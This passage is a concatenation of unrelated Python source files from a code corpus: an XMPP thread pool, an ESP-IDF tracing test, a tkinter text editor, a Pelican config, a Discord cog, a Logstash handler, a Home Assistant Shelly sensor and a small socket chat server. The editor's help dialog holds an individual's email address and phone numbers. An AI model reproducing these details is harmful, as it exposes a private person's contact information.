self.name, self.io_handler))
ret = self.io_handler.prepare()
logger.debug("{0}: prepare result: {1!r}".format(self.name,
ret))
if isinstance(ret, HandlerReady):
prepared = True
elif isinstance(ret, PrepareAgain):
if ret.timeout is not None:
timeout = ret.timeout
else:
raise TypeError("Unexpected result type from prepare()")
if self.io_handler.is_readable():
logger.debug("{0}: readable".format(self.name))
fileno = self.io_handler.fileno()
if fileno is not None:
readable = wait_for_read(fileno, interval)
if readable:
self.io_handler.handle_read()
elif not prepared:
if timeout:
time.sleep(timeout)
else:
logger.debug("{0}: waiting for readability".format(self.name))
if not self.io_handler.wait_for_readability():
break
class WrittingThread(IOThread):
"""A thread reading from io_handler.
It can be used (together with `WrittingThread`) instead of
a main loop."""
def __init__(self, settings, io_handler, name = None, daemon = True,
exc_queue = None):
# pylint: disable=R0913
if name is None:
name = "{0!r} writer".format(io_handler)
IOThread.__init__(self, settings, io_handler, name, daemon, exc_queue)
def run(self):
"""The thread function.
Loop waiting for the handler and socket being writable and calling
`interfaces.IOHandler.handle_write`.
"""
while not self._quit:
interval = self.settings["poll_interval"]
if self.io_handler.is_writable():
logger.debug("{0}: writable".format(self.name))
fileno = self.io_handler.fileno()
if fileno is not None:
writable = wait_for_write(fileno, interval)
if writable:
self.io_handler.handle_write()
else:
logger.debug("{0}: waiting for writaility".format(self.name))
if not self.io_handler.wait_for_writability():
break
class EventDispatcherThread(object):
"""Event dispatcher thread.
:Ivariables:
- `name`: thread name (for debugging)
- `event_queue`: the event queue to poll
- `thread`: the actual thread object
- `exc_info`: this will hold exception information tuple whenever the
thread was aborted by an exception.
:Types:
- `name`: `str`
- `event_queue`: :std:`Queue.Queue`
- `thread`: :std:`threading.Thread`
- `exc_info`: (type, value, traceback) tuple
"""
def __init__(self, event_dispatcher, name = None,
daemon = True, exc_queue = None):
if name is None:
name = "event dispatcher"
self.name = name
self.thread = threading.Thread(name = name, target = self.run)
self.thread.daemon = daemon
self.exc_info = None
self.exc_queue = exc_queue
self.event_dispatcher = event_dispatcher
def start(self):
"""Start the thread."""
self.thread.start()
def is_alive(self):
"""Check if the thread is alive."""
return self.thread.is_alive()
def join(self, timeout):
"""Join the thread."""
return self.thread.join(timeout)
def run(self):
"""The thread function. Calls `self.run()` and if it raises
an exception, stores it in self.exc_info and exc_queue
"""
logger.debug("{0}: entering thread".format(self.name))
while True:
try:
self.event_dispatcher.loop()
except Exception: # pylint: disable-msg=W0703
self.exc_info = sys.exc_info()
logger.debug("exception in the {0!r} thread:"
.format(self.name), exc_info = self.exc_info)
if self.exc_queue:
self.exc_queue.put( (self, self.exc_info) )
continue
else:
logger.debug("{0}: aborting thread".format(self.name))
return
except:
logger.debug("{0}: aborting thread".format(self.name))
return
break
logger.debug("{0}: exiting thread".format(self.name))
class TimeoutThread(object):
"""Thread to handle `TimeoutHandler` methods.
:Ivariables:
- `method`: the timeout handler method
- `name`: thread name (for debugging)
- `thread`: the actual thread object
- `exc_info`: this will hold exception information tuple whenever the
thread was aborted by an exception.
- `exc_queue`: queue for raised exceptions
:Types:
- `name`: `str`
- `method`: a bound method decorated with `interfaces.timeout_handler`
- `thread`: :std:`threading.Thread`
- `exc_info`: (type, value, traceback) tuple
- `exc_queue`: queue for raised exceptions
"""
def __init__(self, method, name = None, daemon = True, exc_queue = None):
if name is None:
name = "{0!r} timer thread"
self.name = name
self.method = method
self.thread = threading.Thread(name = name, target = self._run)
self.thread.daemon = daemon
self.exc_info = None
self.exc_queue = exc_queue
self._quit = False
def start(self):
"""Start the thread.
"""
self.thread.start()
def is_alive(self):
"""Check if the thread is alive."""
return self.thread.is_alive()
def stop(self):
"""Request the thread to stop."""
self._quit = True
def join(self, timeout):
"""Join the thread (wait until it stops)."""
return self.thread.join(timeout)
def _run(self):
"""The thread function. Calls `self.run()` and if it raises
an exception, stores it in self.exc_info
"""
logger.debug("{0}: entering thread".format(self.name))
while True:
try:
self.run()
except Exception: # pylint: disable-msg=W0703
self.exc_info = sys.exc_info()
logger.debug("exception in the {0!r} thread:"
.format(self.name), exc_info = self.exc_info)
if self.exc_queue:
self.exc_queue.put( (self, self.exc_info) )
continue
else:
logger.debug("{0}: aborting thread".format(self.name))
return
except:
logger.debug("{0}: aborting thread".format(self.name))
return
break
logger.debug("{0}: exiting thread".format(self.name))
def run(self):
"""The thread function."""
# pylint: disable-msg=W0212
timeout = self.method._pyxmpp_timeout
recurring = self.method._pyxmpp_recurring
while not self._quit and timeout is not None:
if timeout:
time.sleep(timeout)
if self._quit:
break
ret = self.method()
if recurring is None:
timeout = ret
elif not recurring:
break
class ThreadPool(MainLoop):
"""Thread pool object, as a replacement for an asychronous event loop."""
# pylint: disable-msg=R0902
def __init__(self, settings = None, handlers = None):
self.settings = settings if settings else XMPPSettings()
self.io_handlers = []
self.timeout_handlers = []
self.event_queue = self.settings["event_queue"]
self.event_dispatcher = EventDispatcher(self.settings, handlers)
self.exc_queue = queue.Queue()
self.io_threads = []
self.timeout_threads = []
self.event_thread = None
self.daemon = False
if handlers:
for handler in handlers:
self.add_handler(handler)
def add_handler(self, handler):
if isinstance(handler, IOHandler):
self._add_io_handler(handler)
if isinstance(handler, EventHandler):
self.event_dispatcher.add_handler(handler)
if isinstance(handler, TimeoutHandler):
self._add_timeout_handler(handler)
def remove_handler(self, handler):
if isinstance(handler, IOHandler):
self._remove_io_handler(handler)
if isinstance(handler, EventHandler):
self.event_dispatcher.remove_handler(handler)
if isinstance(handler, TimeoutHandler):
self._remove_timeout_handler(handler)
def _add_io_handler(self, handler):
"""Add an IOHandler to the pool.
"""
self.io_handlers.append(handler)
if self.event_thread is None:
return
self._run_io_threads(handler)
def _run_io_threads(self, handler):
"""Start threads for an IOHandler.
"""
reader = ReadingThread(self.settings, handler, daemon = self.daemon,
exc_queue = self.exc_queue)
writter = WrittingThread(self.settings, handler, daemon = self.daemon,
exc_queue = self.exc_queue)
self.io_threads += [reader, writter]
reader.start()
writter.start()
def _remove_io_handler(self, handler):
"""Remove an IOHandler from the pool.
"""
if handler not in self.io_handlers:
return
self.io_handlers.remove(handler)
for thread in self.io_threads:
if thread.io_handler is handler:
thread.stop()
def _add_timeout_handler(self, handler):
"""Add a TimeoutHandler to the pool.
"""
self.timeout_handlers.append(handler)
if self.event_thread is None:
return
self._run_timeout_threads(handler)
def _run_timeout_threads(self, handler):
"""Start threads for a TimeoutHandler.
"""
# pylint: disable-msg=W0212
for dummy, method in inspect.getmembers(handler, callable):
if not hasattr(method, "_pyxmpp_timeout"):
continue
thread = TimeoutThread(method, daemon = self.daemon,
exc_queue = self.exc_queue)
self.timeout_threads.append(thread)
thread.start()
def _remove_timeout_handler(self, handler):
"""Remove a TimeoutHandler from the pool.
"""
if handler not in self.timeout_handlers:
return
self.timeout_handlers.remove(handler)
for thread in self.timeout_threads:
if thread.method.__self__ is handler:
thread.stop()
def start(self, daemon = False):
"""Start the threads."""
self.daemon = daemon
self.io_threads = []
self.event_thread = EventDispatcherThread(self.event_dispatcher,
daemon = daemon, exc_queue = self.exc_queue)
self.event_thread.start()
for handler in self.io_handlers:
self._run_io_threads(handler)
for handler in self.timeout_handlers:
self._run_timeout_threads(handler)
def stop(self, join = False, timeout = None):
"""Stop the threads.
:Parameters:
- `join`: join the threads (wait until they exit)
- `timeout`: maximum time (in seconds) to wait when `join` is
`True`). No limit when `timeout` is `None`.
"""
logger.debug("Closing the io handlers...")
for handler in self.io_handlers:
handler.close()
if self.event_thread.is_alive():
logger.debug("Sending the QUIT signal")
self.event_queue.put(QUIT)
logger.debug(" sent")
threads = self.io_threads + self.timeout_threads
for thread in threads:
logger.debug("Stopping thread: {0!r}".format(thread))
thread.stop()
if not join:
return
if self.event_thread:
threads.append(self.event_thread)
if timeout is None:
for thread in threads:
thread.join()
else:
timeout1 = (timeout * 0.01) / len(threads)
threads_left = []
for thread in threads:
logger.debug("Quick-joining thread {0!r}...".format(thread))
thread.join(timeout1)
if thread.is_alive():
logger.debug(" thread still alive".format(thread))
threads_left.append(thread)
if threads_left:
timeout2 = (timeout * 0.99) / len(threads_left)
for thread in threads_left:
logger.debug("Joining thread {0!r}...".format(thread))
thread.join(timeout2)
self.io_threads = []
self.event_thread = None
@property
def finished(self):
return self.event_thread is None or not self.event_thread.is_alive()
@property
def started(self):
return self.event_thread is not None
def quit(self):
self.event_queue.put(QUIT)
def loop(self, timeout = None):
if not self.event_thread:
return
interval = self.settings["poll_interval"]
if timeout is None:
while self.event_thread.is_alive():
self.loop_iteration(interval)
else:
timeout = time.time() + timeout
while self.event_thread.is_alive() and time.time() < timeout:
self.loop_iteration(interval)
def loop_iteration(self, timeout = 0.1):
"""Wait up to `timeout` seconds, raise any exception from the
threads.
"""
try:
exc_info = self.exc_queue.get(True, timeout)[1]
except queue.Empty:
return
exc_type, exc_value, exc_stack = exc_info
raise exc_value.with_traceback(exc_stack)
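# A minimal usage sketch for the thread-pool main loop (the handler objects
# are assumptions; real code would pass concrete IOHandler / EventHandler /
# TimeoutHandler implementations, e.g. an XMPP transport):
#
#     pool = ThreadPool(settings, [transport, my_event_handler])
#     pool.start(daemon = True)
#     try:
#         pool.loop(timeout = 60)   # re-raises any exception from the threads
#     finally:
#         pool.stop(join = True, timeout = 5)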
|
nilq/baby-python
|
python
|
# encoding: utf-8
"""
@version: v1.0
@author: Richard
@license: Apache Licence
@contact: billions.richard@qq.com
@site:
@software: PyCharm
@time: 2019/11/30 20:03
"""
|
nilq/baby-python
|
python
|
from __future__ import unicode_literals
import os
import re
import tempfile
from io import open
import debug_backend
import ttfw_idf
@ttfw_idf.idf_example_test(env_tag='test_jtag_arm')
def test_examples_sysview_tracing_heap_log(env, extra_data):
rel_project_path = os.path.join('examples', 'system', 'sysview_tracing_heap_log')
dut = env.get_dut('sysview_tracing_heap_log', rel_project_path)
proj_path = os.path.join(dut.app.idf_path, rel_project_path)
elf_path = os.path.join(dut.app.binary_path, 'sysview_tracing_heap_log.elf')
def get_temp_file():
with tempfile.NamedTemporaryFile(delete=False) as f:
return f.name
try:
tempfiles = [get_temp_file(), get_temp_file()]
with open(os.path.join(proj_path, 'gdbinit')) as f_in, open(tempfiles[0], 'w') as f_out:
new_content = f_in.read()
# localhost connection issue occurs in docker unless:
new_content = new_content.replace(':3333', '127.0.0.1:3333', 1)
new_content = new_content.replace('file:///tmp/heap_log.svdat', 'file://{}'.format(tempfiles[1]), 1)
f_out.write(new_content)
with ttfw_idf.OCDBackend(os.path.join(proj_path, 'openocd.log'), dut.app.target):
dut.start_app()
dut.expect('esp_apptrace: Initialized TRAX on CPU0')
gdb_log = os.path.join(proj_path, 'gdb.log')
gdb_workdir = os.path.join(proj_path, 'main')
with ttfw_idf.GDBBackend(gdb_log, elf_path, dut.app.target, tempfiles[0], gdb_workdir) as p:
for _ in range(2): # There are two breakpoints
p.gdb.wait_target_state(debug_backend.TARGET_STATE_RUNNING)
stop_reason = p.gdb.wait_target_state(debug_backend.TARGET_STATE_STOPPED)
assert stop_reason == debug_backend.TARGET_STOP_REASON_BP, 'STOP reason: {}'.format(stop_reason)
# dut has been restarted by gdb since the last dut.expect()
dut.expect('esp_apptrace: Initialized TRAX on CPU0')
with ttfw_idf.CustomProcess(' '.join([os.path.join(dut.app.idf_path, 'tools/esp_app_trace/sysviewtrace_proc.py'),
'-p',
'-b', elf_path,
tempfiles[1]]),
logfile='sysviewtrace_proc.log') as sysviewtrace:
sysviewtrace.pexpect_proc.expect(re.compile(r'Found \d+ leaked bytes in \d+ blocks.'), timeout=120)
finally:
for x in tempfiles:
try:
os.unlink(x)
except Exception:
pass
if __name__ == '__main__':
test_examples_sysview_tracing_heap_log()
|
nilq/baby-python
|
python
|
from tkinter import *
from tkinter.messagebox import showinfo,askyesnocancel
from tkinter.filedialog import askopenfilename,asksaveasfilename
import os
from tkinter import simpledialog
def new(event=None): #.................Creates a new file, offering to save the current file...........#
global file
var=askyesnocancel("New..","Do you want to save your document")
if(var!=None):
if(var==True):
saveas()
if(file!=None):
root.title("Untitled - J_PAD")
file=None
text.delete(1.0,END)
def openfile(event=None): #.................opens desired file in J_PAD...........#
global file
file=askopenfilename(defaultextension=".txt",filetypes=[("All files","*.*"),("Text Document","*.txt")])
if file == "": #.................Checks file exists or not...........#
file=None
else:
root.title(os.path.basename(file)+"-J_PAD")
text.delete(1.0,END)
f=open(file,"r")
text.insert(1.0,f.read())
f.close()
def saveas(event=None): #.................Saves known file with same name and untitled files with a new name in desired location...........#
global file
if file==None: #.................Checks file is untitled or known...........#
file = asksaveasfilename(initialfile='Untitled.txt',defaultextension=".txt",filetypes=[("All files","*.*"),("Text Document","*.txt")])
if file =="": #.................Checks file exists or not...........#
file=None
else:
f=open(file,"w")
f.write(text.get(1.0,END))
f.close()
root.title(os.path.basename(file)+"-J_PAD")
else:
f=open(file,"w") #.................Write to the existing file...........#
f.write(text.get(1.0,END))
f.close()
def exitroot(event=None): #.................Exits the main loop...........#
var=askyesnocancel(title=f"QUIT-{file}",message="Do you want to save the file before exit..")
if(var!=None):
if(var==True):
saveas()
root.destroy()
def copy(event=None): #.................Handles copy operation in file...........#
text.event_generate(("<<Copy>>"))
def paste(event=None): #.................Handles paste operation in file...........#
text.event_generate(("<<Paste>>"))
def selectall(event=None): #................Selects all the text in the file...........#
text.tag_add(SEL,"1.0",END)
text.mark_set(INSERT,"1.0")
text.see(INSERT)
return 'break'
def cut(event=None): #.................Handles cut operation in file...........#
text.event_generate(("<<Cut>>"))
def find(event=None): #.................finds the occurrences of a given word...........#
findstr=simpledialog.askstring("Find...","Enter the text you want to search")
if findstr: #................do nothing if the dialog was cancelled...........#
textstr=text.get(1.0,END)
occurrences=textstr.count(findstr)
showinfo("Find...",f"{findstr} has {occurrences} occurrences in the text")
def about(event=None): #.................about J_PAD...........#
showinfo("J-PAD","Text editor by Himanshu")
def help(event=None): #.................Shows important information for help...........#
showinfo("Help...","For any help mail your queries on gmail devranihimanshu81@gmail.com\nContact on given numbers :- 9548609762 9761594415")
file=None
#.............................Main window layout......................#
root=Tk() #...................creates new window...............#
root.wm_iconbitmap("1.ico")
root.title("Untitled-J_PAD") #..................title of the root............#
root.geometry("1000x800") #...................defines initial geometry to the root.........#
scrollbarx=Scrollbar(root) #....................add scroll bar................#
scrollbarx.pack(side=RIGHT,fill=Y)
text = Text(root,font="comicsansms 11 bold") #....................text area for editor..........#
text.pack(expand=True,fill=BOTH)
scrollbarx.config(command=text.yview) #....................fix scroll bar with y view of text area...........#
menubar=Menu(root) #..............................Menu bar......................#
#.....................file menu......................#
filemenu=Menu(menubar,tearoff=0)
filemenu.add_command(label="New",command=new,accelerator="Ctrl+N")
root.bind_all("<Control-N>",new) #..........binds function with key press.........#
root.bind_all("<Control-n>",new)
filemenu.add_command(label="Open",command=openfile,accelerator="Ctrl+O")
root.bind_all("<Control-o>",openfile) #..........binds function with key press.........#
root.bind_all("<Control-O>",openfile)
filemenu.add_command(label="Save As",command=saveas,accelerator="Ctrl+S")
root.bind_all("<Control-s>",saveas) #..........binds function with key press.........#
root.bind_all("<Control-S>",saveas)
filemenu.add_separator()
filemenu.add_command(label="Exit",command=exitroot,accelerator="Ctrl+Q")
root.bind_all("<Control-q>",exitroot) #..........binds function with key press.........#
root.bind_all("<Control-Q>",exitroot)
menubar.add_cascade(label="File",menu=filemenu)
#.....................edit menu......................#
editmenu=Menu(menubar,tearoff=0)
editmenu.add_command(label="Copy",command=copy,accelerator="Ctrl+C")
root.bind_all("<Control-C>",copy) #..........binds function with key press.........#
root.bind_all("<Control-c>",copy)
editmenu.add_command(label="Paste",command=paste,accelerator="Ctrl+V")
root.bind_all("<Control-v>",paste) #..........binds function with key press.........#
root.bind_all("<Control-V>",paste)
editmenu.add_command(label="Cut",command=cut,accelerator="Ctrl+X")
root.bind_all("<Control-X>",cut) #..........binds function with key press.........#
root.bind_all("<Control-x>",cut)
editmenu.add_separator()
editmenu.add_command(label="Select All",command=selectall,accelerator="Ctrl+A")
root.bind_all("<Control-A>",selectall) #..........binds function with key press.........#
root.bind_all("<Control-a>",selectall)
editmenu.add_command(label="Find",command=find,accelerator="Ctrl+F")
root.bind_all("<Control-F>",find) #..........binds function with key press.........#
root.bind_all("<Control-f>",find)
menubar.add_cascade(label="Edit",menu=editmenu)
#.....................help menu......................#
helpmenu=Menu(menubar,tearoff=0)
helpmenu.add_command(label="Help",command=help)
helpmenu.add_command(label="About",command=about)
menubar.add_cascade(label="Help",menu=helpmenu)
root.config(menu=menubar)
root.mainloop() #..........................starts root.................#
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
Topic: Reading and writing text files
Desc :
"""
def rw_text():
# Iterate over the lines of the file
with open('somefile.txt', 'rt') as f:
for line in f:
# process line
print(line)
# Write chunks of text data
with open('somefile.txt', 'wt') as f:
f.write('text1')
f.write('text2')
if __name__ == '__main__':
rw_text()
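# A small companion sketch: the same text I/O with an explicit encoding, for
# platforms whose default encoding is not UTF-8 (file name is illustrative):
def rw_text_utf8():
    with open('somefile.txt', 'wt', encoding='utf-8') as f:
        f.write('text1\n')
        f.write('text2\n')
    with open('somefile.txt', 'rt', encoding='utf-8') as f:
        for line in f:
            print(line, end='')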
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*- #
from __future__ import unicode_literals
AUTHOR = u'Eevee'
SITENAME = u'fuzzy notepad'
SITEURL = ''
#SITESUBTITLE = ...
TIMEZONE = 'America/Los_Angeles'
DEFAULT_LANG = u'en'
# Feed generation is usually not desired when developing
FEED_ATOM = None
FEED_ALL_ATOM = None
CATEGORY_FEED_ATOM = None
TRANSLATION_FEED_ATOM = None
# Blogroll
# TODO lol these don't exist in my theme and i'm not sure whether i care??
LINKS = (('Pelican', 'http://getpelican.com/'),
('Python.org', 'http://python.org/'),
('Jinja2', 'http://jinja.pocoo.org/'),
('You can modify those links in your config file', '#'),)
# Social cruft
# TODO theme doesn't support this, but i'd kinda like it for the main page
SOCIAL = (('You can add links in your config file', '#'),
('Another social link', '#'),)
TWITTER_USERNAME = 'eevee'
GITHUB_URL = 'https://github.com/eevee'
DEFAULT_PAGINATION = 17
DEFAULT_ORPHANS = 4
PAGINATION_PATTERNS = (
(1, '{base_name}/', '{base_name}/index.html'),
(2, '{base_name}/page/{number}/', '{base_name}/page/{number}/index.html'),
)
THEME = 'theme'
EXTRA_HEADER = """
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.0/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery.colorbox/1.4.33/jquery.colorbox-min.js"></script>
<script type="text/javascript">
$(function() {
$('article').each(function(index, article) {
console.log(index, article);
$(article).find('a.photo').colorbox({
fixed: true,
maxWidth: '100%',
maxHeight: '100%',
rel: 'colorbox' + String(index + 1)
});
});
});
</script>
"""
# Smart quotes and other things
TYPOGRIFY = True
MD_EXTENSIONS = [
'codehilite(css_class=highlight,linenums=True)',
'extra',
# GitHub-style fenced code blocks
'fenced_code',
# I don't actually care about a table of contents, but this turns headers
# into self-links
'toc(anchorlink=True)',
]
PATH = 'content/'
PAGE_DIR = '../pages/'
STATIC_PATHS = ['favicon.png', 'media']
# URL schema; compatible with Octopress, but i happen to like it anyway
ARCHIVES_URL = 'blog/archives/' # doesn't officially exist but whatever
ARCHIVES_SAVE_AS = 'blog/archives/index.html'
ARTICLE_URL = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/'
ARTICLE_SAVE_AS = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html'
AUTHOR_SAVE_AS = False
AUTHORS_SAVE_AS = False
CATEGORIES_URL = 'blog/categories/'
CATEGORIES_SAVE_AS = 'blog/categories/index.html'
CATEGORY_URL = 'blog/categories/{slug}/'
CATEGORY_SAVE_AS = 'blog/categories/{slug}/index.html'
PAGE_URL = '{slug}/'
PAGE_SAVE_AS = '{slug}/index.html'
TAG_URL = 'blog/tags/{slug}/'
TAG_SAVE_AS = 'blog/tags/{slug}/index.html'
TAGS_URL = 'blog/tags/'
TAGS_SAVE_AS = 'blog/tags/index.html'
# Octopress-compatible filename metadata parsing
FILENAME_METADATA = '(?P<date>\d{4}-\d{2}-\d{2})-(?P<slug>.*)'
# Uncomment following line if you want document-relative URLs when developing
#RELATIVE_URLS = True
### Plugins
# Some minor hackery to have multiple PLUGIN_PATHs, since I want both canonical
# plugins and one of my own...
import os.path
import sys
sys.path.insert(0, os.path.dirname(__file__))
import eeveeblog.liquid_photo
PLUGIN_PATH = "pelican-plugins.git"
PLUGINS = [
eeveeblog.liquid_photo,
'summary'
]
# Plugin config for summary
SUMMARY_BEGIN_MARKER = '<!-- just kidding i never use this -->'
SUMMARY_END_MARKER = '<!-- more -->' # octopress compat
# This is actually a stock setting; I don't want an automatic summary if I
# don't use an explicit marker
SUMMARY_MAX_LENGTH = None
|
nilq/baby-python
|
python
|
"""
Commands for fun
"""
from discord.ext import commands
class FunCommands(commands.Cog, name='Fun'):
def __init__(self, bot):
print('Loading FunCommands module...', end='')
self.bot = bot
print(' Done')
@commands.command(help='You spin me right round, baby, right round')
async def spin(self, ctx):
await ctx.send('https://www.youtube.com/watch?v=PGNiXGX2nLU')
@commands.command(aliases=['XcQ'], help='A very interesting video you should consider watching')
async def rickroll(self, ctx):
await ctx.send('<https://www.youtube.com/watch?v=dQw4w9WgXcQ>')
await ctx.send('<:kappa_jtcf:546748910765604875>')
@commands.command()
async def ping(self, ctx):
pong = await ctx.send('pong!')
time_diff = pong.created_at - ctx.message.created_at
await pong.edit(content='pong!\nTime delta is {0} ms'.format(time_diff.total_seconds()*1000))
@commands.command(hidden=True, aliases=['UDOD_COMMUNIST', 'UDOD', 'udod', 'УДОД_КОММУНИСТ', 'Удод_Коммунист', 'УДОД', 'Удод', 'удод'])
async def udod_communist(self, ctx):
await ctx.send('https://www.youtube.com/watch?v=YHR5_IvC8Gw')
@commands.command(hidden=True, aliases=['UDOD_COMMUNIST_2', 'UDOD2', 'udod2', 'УДОД_КОММУНИСТ_2', 'Удод_Коммунист_2', 'УДОД2', 'Удод2', 'удод2'])
async def udod_communist2(self, ctx):
await ctx.send('https://youtu.be/BgF5HcnNN-Q')
def setup(bot):
bot.add_cog(FunCommands(bot))
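# A minimal sketch of wiring this cog into a bot (discord.py 1.x style,
# matching the setup() hook above; the module path and token are placeholders):
#
#     from discord.ext import commands
#     bot = commands.Bot(command_prefix='!')
#     bot.load_extension('fun_commands')   # module containing this file
#     bot.run('YOUR_TOKEN')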
|
nilq/baby-python
|
python
|
from logging.handlers import DatagramHandler, SocketHandler
from logstash import formatter
# Derive from object to force a new-style class and thus allow super() to work
# on Python 2.6
class TCPLogstashHandler(SocketHandler, object):
"""Python logging handler for Logstash. Sends events over TCP.
:param host: The host of the logstash server.
:param port: The port of the logstash server (default 5959).
:param message_type: The type of the message (default logstash).
:param fqdn: Indicates whether to show fully qualified domain name or not (default False).
:param tags: list of tags for a logger (default is None).
:param limit_stacktrace: limit characters for stacktraces
:param limit_string_fields: limit characters for string fields
:param limit_containers: limit length of containers (dict, list, set)
"""
def __init__(self, host, port=5959, message_type='logstash', tags=None, fqdn=False,
limit_stacktrace=0, limit_string_fields=0, limit_containers=0):
super(TCPLogstashHandler, self).__init__(host, port)
self.formatter = formatter.LogstashFormatter(message_type, tags, fqdn, limit_stacktrace=limit_stacktrace,
limit_string_fields=limit_string_fields,
limit_containers=limit_containers)
def makePickle(self, record):
return self.formatter.format(record) + b'\n'
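# A minimal usage sketch (host and port are assumptions; point them at a
# Logstash instance with a TCP input listening on the chosen port):
#
#     import logging
#     logger = logging.getLogger('example')
#     logger.setLevel(logging.INFO)
#     logger.addHandler(TCPLogstashHandler('localhost', 5959, tags=['example']))
#     logger.info('hello logstash')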
|
nilq/baby-python
|
python
|
"""
Get Shelly Cloud information for a given host through web api.
For more details about this platform, please refer to the documentation at
https://github.com/marcogazzola/custom_components/blob/master/README.md
"""
import logging
from homeassistant.helpers.entity import (Entity)
from .const import (
REQUIREMENTS_LIST,
CONF_DEVICES, DOMAIN as SHELLY_DOMAIN,
CONST_SENSOR_ROLLER, CONST_SENSOR_RELAY,
SENSOR_ICONS, CONST_SENSOR_SYSTEM, CONST_SENSOR_MQTT,
CONST_SENSOR_CLOUD, CONST_SENSOR_WIFI, CONST_UPTODATE,
CONST_UPDATEAVAILABLE, CONST_SENSOR_FIRMWARE, CONST_DISCONNECTED,
CONST_CONNECTED)
REQUIREMENTS = [REQUIREMENTS_LIST]
_LOGGER = logging.getLogger(__name__)
def setup_platform(
hass, config, add_entities, discovery_info=None):
"""Add the Shelly Cloud Sensor entities"""
from shellypython.const import (WORKING_MODE_RELAY, WORKING_MODE_ROLLER)
for ip_address, shelly_data in (
hass.data[SHELLY_DOMAIN][CONF_DEVICES].items()):
if ip_address not in hass.data[SHELLY_DOMAIN]['sensor']:
if shelly_data is not None and shelly_data.data is not None:
if shelly_data.data.working_mode_raw == WORKING_MODE_RELAY:
if CONST_SENSOR_ROLLER in shelly_data.monitored_conditions:
shelly_data.monitored_conditions.remove(
CONST_SENSOR_ROLLER)
elif shelly_data.data.working_mode_raw == WORKING_MODE_ROLLER:
if CONST_SENSOR_RELAY in shelly_data.monitored_conditions:
shelly_data.monitored_conditions.remove(
CONST_SENSOR_RELAY)
sensors = []
for variable in shelly_data.monitored_conditions:
sensors.append(
ShellySensor(shelly_data, variable, shelly_data.name))
hass.data[SHELLY_DOMAIN]['sensor'].append(ip_address)
add_entities(sensors, True)
class ShellySensor(Entity):
"""Implementation of Shelly sensor."""
def __init__(self, shelly_data, sensor_type, name):
"""Initialize the sensor."""
self.client_name = name
self._name = sensor_type
self.shelly_data = shelly_data
self.type = sensor_type
self._state = None
self._unit_of_measurement = None
self._attributes = None
@property
def name(self):
"""Return the name of the sensor."""
return '{} {}'.format(self.client_name, self._name)
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit_of_measurement
@property
def icon(self):
"""Return the icon to represent this sensor."""
if self.type in SENSOR_ICONS:
return SENSOR_ICONS[self.type]
return SENSOR_ICONS[CONST_SENSOR_SYSTEM]
@property
def state(self):
"""Return the expiration days for hostname."""
return self._state
@property
def device_state_attributes(self):
"""Get the more info attributes."""
return self._attributes
def _empty_state_and_attributes(self):
"""Empty the state and attributes on an error."""
from shellypython.const import (DEVICE_NOT_READY)
self._state = DEVICE_NOT_READY
self._attributes = None
def update(self):
"""Get the current Shelly status."""
# self.shelly_data.update()
if self.shelly_data is None or self.shelly_data.data is None:
self._empty_state_and_attributes()
return
if self.type == CONST_SENSOR_SYSTEM:
self._state = self.shelly_data.data.main_status
attributes_data = (
self.shelly_data.data.system.as_dict()
if self.shelly_data.data.system is not None
else {}  # empty dict keeps the .update() calls below safe
)
attributes_data.update({'model': self.shelly_data.data.model})
attributes_data.update(
{'working_mode': self.shelly_data.data.working_mode}
)
attributes_data.update(
{'host_name': self.shelly_data.data.host_name}
)
self._attributes = attributes_data
elif self.type == CONST_SENSOR_MQTT:
attributes_data = (
self.shelly_data.data.mqtt
if self.shelly_data.data.mqtt is not None
else None)
if attributes_data is None or not attributes_data.connected:
self._state = CONST_DISCONNECTED
else:
self._state = CONST_CONNECTED
self._attributes = None
elif self.type == CONST_SENSOR_CLOUD:
attributes_data = (
self.shelly_data.data.cloud
if self.shelly_data.data.cloud is not None
else None)
if attributes_data is None or not attributes_data.connected:
self._state = CONST_DISCONNECTED
else:
self._state = CONST_CONNECTED
self._attributes = None
elif self.type == CONST_SENSOR_WIFI:
attributes_data = (
self.shelly_data.data.wifi_sta
if self.shelly_data.data.wifi_sta is not None
else None)
if attributes_data is None or not attributes_data.connected:
self._state = CONST_DISCONNECTED
self._attributes = None
else:
self._state = "{} %".format(attributes_data.quality)
self._attributes = {
"Ssid": attributes_data.ssid,
"Ip": attributes_data.ip,
"Rssi": attributes_data.rssi,
}
elif self.type == CONST_SENSOR_FIRMWARE:
attributes_data = (
self.shelly_data.data.firmware
if self.shelly_data.data.firmware is not None
else None)
if attributes_data is None or not attributes_data.has_update:
self._state = CONST_UPTODATE
self._attributes = (
{"Current version": attributes_data.old_version}
if attributes_data is not None else None
)
else:
self._state = CONST_UPDATEAVAILABLE
self._attributes = {
"Current version": attributes_data.old_version,
"Latest version": attributes_data.new_version,
}
|
nilq/baby-python
|
python
|
from socket import *
from select import *
HOST = ''
PORT = 10001
BUFSIZE = 1024
ADDR = (HOST, PORT)
# create the socket
serverSocket = socket(AF_INET, SOCK_STREAM)
# bind the socket to its address
serverSocket.bind(ADDR)
# listen for incoming connections
serverSocket.listen(1)
# accept a connection
clientSocekt, addr_info = serverSocket.accept()
print(clientSocekt)
while True:
data = clientSocekt.recv(65535)
if not data : break # end the session when no data is received
print(data.decode()) # print the received data
line = input()
clientSocekt.sendall(line.encode()) # send the typed text
clientSocekt.close()
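# A matching client sketch (assumed counterpart to the server above: the
# client sends a line first, then waits for the operator's reply):
#
#     from socket import *
#     clientSocket = socket(AF_INET, SOCK_STREAM)
#     clientSocket.connect(('127.0.0.1', 10001))
#     while True:
#         line = input()
#         clientSocket.sendall(line.encode())
#         data = clientSocket.recv(65535)
#         if not data: break
#         print(data.decode())
#     clientSocket.close()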
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
Name: population.py
Authors: Christian Haack, Stephan Meighen-Berger, Andrea Turcati
Constructs the population.
"""
from typing import Union, Tuple
import random
import numpy as np # type: ignore
import logging
import networkx as nx # type: ignore
import scipy.stats
from networkx.utils import py_random_state
from networkx.generators.community import _zipf_rv_below
from ..config import config
from ..pdfs import construct_pdf
from .population_base import Population
_log = logging.getLogger(__name__)
def intra_com_cons(g, u):
c = g.nodes[u]["community"]
adj_in_com = 0
